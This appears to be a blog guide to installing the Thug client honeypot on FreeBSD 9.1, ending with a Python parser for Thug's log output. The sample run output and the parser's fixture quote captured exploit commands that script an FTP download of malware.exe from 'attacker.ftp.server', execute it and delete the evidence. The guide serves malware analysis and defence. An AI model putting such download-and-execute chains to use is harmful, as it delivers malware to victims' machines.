
Thug is a low-interaction client honeypot used for analyzing web-based, client-side attacks. As client-side attacks become more obfuscated and difficult to analyze, Thug can be used to emulate the behavior of a web browser (16 different User-Agents at time of writing) to detect malicious web pages while creating detailed logs and saving payloads.

While looking into Thug I found that there wasn't an existing guide for installing it on FreeBSD. The Thug build documentation is good, but I found it makes a number of assumptions on prerequisites already being installed. After some trial and error I've documented the entire process I used to get Thug running on a fresh FreeBSD 9.1 image.

The following guide was done on a minimal install of FreeBSD 9.1 (i386) with only the 'SSH Server' chosen during installation. Also, all commands are run as the 'root' user.

First we'll install any security updates for the OS and install the latest ports tree:

freebsd-update fetch install
portsnap fetch extract

The Portmaster utility will be used to build and install most of the required packages so we'll install that next:

cd /usr/ports/ports-mgmt/portmaster/ && make -DBATCH install clean

At the time of writing there was an issue with the distribution sites for 'pkgconf', so manually download the port tarball:

cd /usr/ports/distfiles; fetch http://rabbit.dereferenced.org/~nenolod/distfiles/pkgconf-0.8.12.tar.bz2

I also don't want a full X11 installation, just the minimal dependencies, so I add a global 'make' option to /etc/make.conf:

echo "WITHOUT_X11=yes" >> /etc/make.conf

Now install the required tools, libraries and Python modules:

portmaster -dG --no-confirm \
devel/subversion        \
devel/git               \
devel/boost-libs        \
devel/boost-python-libs \
devel/autoconf          \
devel/libtool           \
devel/libexecinfo       \
devel/py-zope.interface \
www/py-beautifulsoup    \
www/py-cssutils         \
www/py-httplib2         \
devel/py-pefile         \
www/py-html5lib         \
textproc/py-chardet     \
devel/py-parsing        \
graphics/py-pydot       \
devel/py-magic

The remaining packages will be built manually so we'll create a directory to work from:

mkdir /usr/local/src; cd /usr/local/src

Thug

Grab the Thug source from GitHub:

git clone https://github.com/buffer/thug.git /opt/thug

Google V8

Pull the latest V8 code from Google Code and apply the required Thug patch:

svn checkout http://v8.googlecode.com/svn/trunk/ v8
patch -p0 < /opt/thug/patches/V8-patch1.diff
setenv V8_HOME /usr/local/src/v8

PyV8

Pull revision 478 of PyV8 from Google Code, build and install:

svn checkout -r478 http://pyv8.googlecode.com/svn/trunk/ pyv8
cd pyv8
python setup.py build
python setup.py install

Libemu

Libemu is for X86 emulation and shellcode detection:

cd /usr/local/src
git clone git://git.carnivore.it/libemu.git
cd libemu
autoreconf -v -i
./configure --prefix=/opt/libemu
make install

Now add the Libemu libraries to the shared library cache:

ldconfig -m /opt/libemu/lib

Pylibemu

Pylibemu is a Python wrapper for the Libemu library:

cd /usr/local/src
git clone git://github.com/buffer/pylibemu.git
cd pylibemu
python setup.py build
python setup.py install

You should now have a fully functional Thug installation! You can test it out with some of the samples that come with the Thug source:

python /opt/thug/src/thug.py -l /opt/thug/samples/exploits/hpinfo1.html

Output:

[2013-03-11 19:48:47] <object classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A" height="0" id="o2obj" width="0">
</object>
[2013-03-11 19:48:47] ActiveXObject: 62DDEB79-15B2-41E3-8834-D3B80493887A
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C echo open attacker.ftp.server >> c:\ftpd&echo IDidntDoAnything>> c:\ftpd&echo password>> c:    \ftpd&echo binary>> c:\ftpd&echo get malware.exec:\malware.exe >> c:\ftpd&echo quit>> c:\ftpd
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C echo cd c:\>> c:\ftpd.bat&echo ftp -s:ftpd>> c:\ftpd.bat&echo start c:\malware.exe >> c:\ftpd.bat
[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C c:\ftpd.bat&del c:\ftpd.bat&del c:\ftpd&del c:\malware.exe
[2013-03-11 19:48:47] Saving log analysis at ../logs/64037689e0e2abeb11475e13e80e904f/20130311194846
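Once Thug is producing output like the above, the next step is usually to pull the interesting facts out of it: which ActiveX CLSIDs the page instantiated, what the emulated control was asked to launch, and where Thug saved its log directory. The parser below is an added example written for this post, not code from the Thug project; the log lines it feeds itself are a constructed fixture copied (lightly trimmed) from the run above, and the `>>` redirection heuristic in dropped_files is my own assumption about how these command strings are shaped.

```python
import re

# Constructed fixture: Thug output lines from the run above, trimmed for length
SAMPLE_LINES = [
    r'[2013-03-11 19:48:47] <object classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A" height="0" id="o2obj" width="0">',
    r'</object>',
    r'[2013-03-11 19:48:47] ActiveXObject: 62DDEB79-15B2-41E3-8834-D3B80493887A',
    r'[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C echo open attacker.ftp.server >> c:\ftpd&echo quit>> c:\ftpd',
    r'[2013-03-11 19:48:47] [HP Info Center ActiveX] LaunchApp called to run: c:\windows\system32\cmd.exe /C c:\ftpd.bat&del c:\ftpd.bat&del c:\ftpd&del c:\malware.exe',
    r'[2013-03-11 19:48:47] Saving log analysis at ../logs/64037689e0e2abeb11475e13e80e904f/20130311194846',
]

# Every Thug message starts with a "[YYYY-MM-DD HH:MM:SS] " stamp; lines without
# one are continuations of a multi-line HTML element (e.g. "</object>").
STAMP = re.compile(r'^\[(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\] (.*)$')
CLSID = re.compile(r'([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})', re.IGNORECASE)
LAUNCH = re.compile(r'^\[(?P<control>[^\]]+)\] LaunchApp called to run: (?P<cmd>.*)$')
SAVED = re.compile(r'^Saving log analysis at (?P<path>\S+)$')


def parse_thug_output(lines):
    """Summarise a Thug run: CLSIDs seen (both in <object classid=...> tags and
    in ActiveXObject messages), commands the emulated control was asked to
    launch, the set of timestamps, and the directory Thug saved its logs to."""
    summary = {"clsids": [], "launched": [], "timestamps": set(), "log_dir": None}
    for line in lines:
        m = STAMP.match(line)
        if not m:
            continue
        stamp, msg = m.groups()
        summary["timestamps"].add(stamp)
        for clsid in CLSID.findall(msg):
            if clsid.upper() not in summary["clsids"]:
                summary["clsids"].append(clsid.upper())   # de-duplicated, normalised
        launch = LAUNCH.match(msg)
        if launch:
            summary["launched"].append((launch.group("control"), launch.group("cmd")))
        saved = SAVED.match(msg)
        if saved:
            summary["log_dir"] = saved.group("path")
    return summary


def dropped_files(launched):
    """Windows paths written via 'echo ... >> path' in the launched commands:
    the on-disk artifacts a real victim would be left with (assumed heuristic)."""
    found = []
    for _, cmd in launched:
        for path in re.findall(r'>>\s*([a-zA-Z]:\\[^&\s]+)', cmd):
            if path.lower() not in found:
                found.append(path.lower())
    return found
```

Run it against a saved Thug log (`parse_thug_output(open(path).read().splitlines())`) to get the same summary for any sample, not only the fixture embedded here.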

